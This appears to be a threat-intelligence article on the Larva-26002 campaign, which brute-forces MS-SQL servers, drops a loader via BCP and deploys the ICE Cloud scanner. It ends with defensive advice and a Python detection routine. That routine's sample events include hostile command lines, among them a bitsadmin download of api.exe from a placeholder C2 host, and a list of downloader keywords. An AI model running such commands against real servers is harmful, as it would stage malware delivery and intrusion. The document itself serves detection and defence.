Threat Actors Exploit MS-SQL Servers to Deploy ICE Cloud Scanner

Emy Elsamnoudy
March 24, 2026

Key Takeaways

  • The threat group Larva-26002 is actively targeting exposed Microsoft SQL (MS-SQL) servers.
  • The attackers are deploying a new Go-based scanner malware called ICE Cloud Client.
  • The campaign, ongoing since January 2024, has shifted from ransomware to large-scale reconnaissance and credential harvesting.
  • Poor password hygiene on internet-facing MS-SQL servers is the primary initial compromise vector.
  • The campaign’s long-term nature and reconnaissance focus suggest preparation for future, larger-scale attacks.

Persistent Threat Actor Larva-26002 Leverages New ICE Cloud Scanner Against MS-SQL Servers

A sophisticated threat actor, identified as Larva-26002, is relentlessly exploiting vulnerable Microsoft SQL (MS-SQL) servers, deploying a novel scanner malware dubbed ICE Cloud Client. This ongoing campaign, which originated in January 2024, demonstrates a strategic evolution from direct ransomware deployment to extensive reconnaissance of database infrastructure.

Evolution of the Campaign

Larva-26002’s activities initially came to light in January 2024, when the group focused on compromising internet-exposed MS-SQL servers secured with weak credentials. These early attacks involved the deployment of Trigona and Mimic ransomware. The attackers skillfully utilized the legitimate MS-SQL Bulk Copy Program (BCP) utility to exfiltrate data and drop malicious payloads onto compromised systems. Remote access tools such as AnyDesk and various port forwarders for RDP connections were also installed to maintain persistence.

By 2025, the group had refined its toolkit, incorporating Teramind, a remote monitoring and management (RMM) solution, and transitioning to a Rust-based scanner for its operations. This continuous adaptation of tools and tactics underscores the threat actor’s persistent efforts to enhance their capabilities.

Analysts at ASEC observed a renewed surge of attacks in 2026, targeting many of the same MS-SQL servers previously compromised. In this latest phase, Larva-26002 introduced ICE Cloud, a scanner malware developed in the Go programming language, marking a distinct shift from the Rust-based scanner observed in 2025. The presence of Turkish binary strings within ICE Cloud further reinforces its connection to the Mimic ransomware attacks of 2024, indicating a consistent operational footprint.

The strategic pivot from ransomware to widespread scanning is a significant concern. By establishing a growing network of compromised servers that surreptitiously probe other databases for weak credentials, Larva-26002 appears to be meticulously preparing for more substantial future operations. The intelligence gathered from these scanning activities is transmitted to the attacker’s command-and-control (C&C) server, providing a comprehensive overview of vulnerable database assets across the internet.

ICE Cloud Scanner: The Infection Mechanism

The attack sequence begins with Larva-26002 identifying an MS-SQL server accessible from the internet and protected by weak or easily guessable passwords. Initial access is typically gained through brute-force or dictionary attacks.

Upon successful compromise, the attacker executes standard system commands such as hostname, whoami, and netstat -an to gather information about the target host. Malware deployment frequently abuses the legitimate BCP utility to export a malicious binary stored in a database table named uGnzBdZbsi to a local path as api.exe. The export is driven by a BCP format file named FODsOZKgAU.txt, a method that has remained consistent since 2024.

In scenarios where the BCP utility fails to execute, the malware is retrieved using alternative methods, including Curl or Bitsadmin via PowerShell commands.

The api.exe file, identified as the ICE Cloud Launcher, establishes communication with a C&C server for authentication. Following successful authentication, it proceeds to download the core component: the ICE Cloud Client scanner. This client is saved with a random filename to evade detection and mask its malicious nature. After installation, the ICE Cloud Client registers itself with the C&C server, which then dispatches a list of target MS-SQL addresses, along with specific credential pairs (e.g., ecomm/ecomm) and a task string, typically TASK.

The scanner attempts to authenticate against the provided MS-SQL targets using the supplied credentials. Any successful logins are reported back to the C&C server. Notably, the internal binary strings of the ICE Cloud Client are written in Turkish and incorporate emoji characters, potentially suggesting the use of generative AI tools in its development.

What You Should Do

  • Implement strong, unique, and complex passwords for all MS-SQL accounts. Enforce regular password rotation policies.
  • Ensure all internet-facing MS-SQL servers are protected by a robust firewall, restricting access to only authorized IP addresses and necessary ports.
  • Maintain up-to-date endpoint security software across all systems to detect and prevent known malware execution.
  • Monitor for unusual activity related to the BCP utility, unexpected file creations (e.g., api.exe in C:\ProgramData), or unauthorized outbound network connections, and investigate any suspicious indicators promptly.
  • Regularly audit MS-SQL server configurations for security best practices and apply all available security patches and updates.
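As an added example (not code from the article or from ASEC), the following Python routine turns the infection chain and the monitoring advice above into detection logic and runs it over constructed process-creation events: a command chain rooted at sqlservr.exe that runs the recon commands, invokes BCP to write an .exe using a format file, or launches a PowerShell downloader. The table and format-file names reuse those reported in the article; the event records and the C2 URL are constructed placeholders.

```python
import re

# Constructed sample process-creation events (parent image, image, command line).
# These are illustrative records in the shape of the article's description, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c hostname & whoami & netstat -an"},
    {"parent": "sqlservr.exe", "image": "bcp.exe",
     "cmdline": r"bcp uGnzBdZbsi out C:\ProgramData\api.exe -f C:\ProgramData\FODsOZKgAU.txt"},
    {"parent": "sqlservr.exe", "image": "powershell.exe",
     "cmdline": r"powershell -c bitsadmin /transfer j http://C2-PLACEHOLDER/api.exe C:\ProgramData\api.exe"},
    # Benign: an administrator exporting a table from an interactive session.
    {"parent": "explorer.exe", "image": "bcp.exe",
     "cmdline": r"bcp Sales.dbo.Orders out D:\exports\orders.dat -n -T"},
]

SQL_PARENT = "sqlservr.exe"                       # chains rooted here usually mean xp_cmdshell
RECON = {"hostname", "whoami", "netstat"}         # host-survey commands named in the article
DOWNLOADERS = ("curl", "bitsadmin", "invoke-webrequest", "downloadfile")


def classify(event):
    """Return the detection tags an event triggers; an empty list means no rule fired."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"].lower()
    tags = []
    if parent != SQL_PARENT:
        return tags  # only children of the SQL Server process are in scope for these rules
    words = set(re.findall(r"[a-z]+", cmd))
    if words & RECON:
        tags.append("sql-spawned-recon")
    if image == "bcp.exe" or " bcp " in f" {cmd} ":
        # BCP writing an executable to disk, and use of a format file (-f), as in the 2024 playbook
        if re.search(r"\s(out|queryout)\s+\S+\.exe", cmd):
            tags.append("bcp-writes-executable")
        if re.search(r"\s-f\s+\S+", cmd):
            tags.append("bcp-format-file")
    if image == "powershell.exe" and any(d in cmd for d in DOWNLOADERS):
        tags.append("sql-spawned-downloader")  # fallback path when BCP fails
    return tags


def scan(events):
    """Map event index -> tags for every event that triggered at least one rule."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], hits)
```

In production the parent check should walk the full ancestry (sqlservr.exe -> cmd.exe -> bcp.exe), since xp_cmdshell inserts a cmd.exe hop between the SQL service and the tool it runs.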
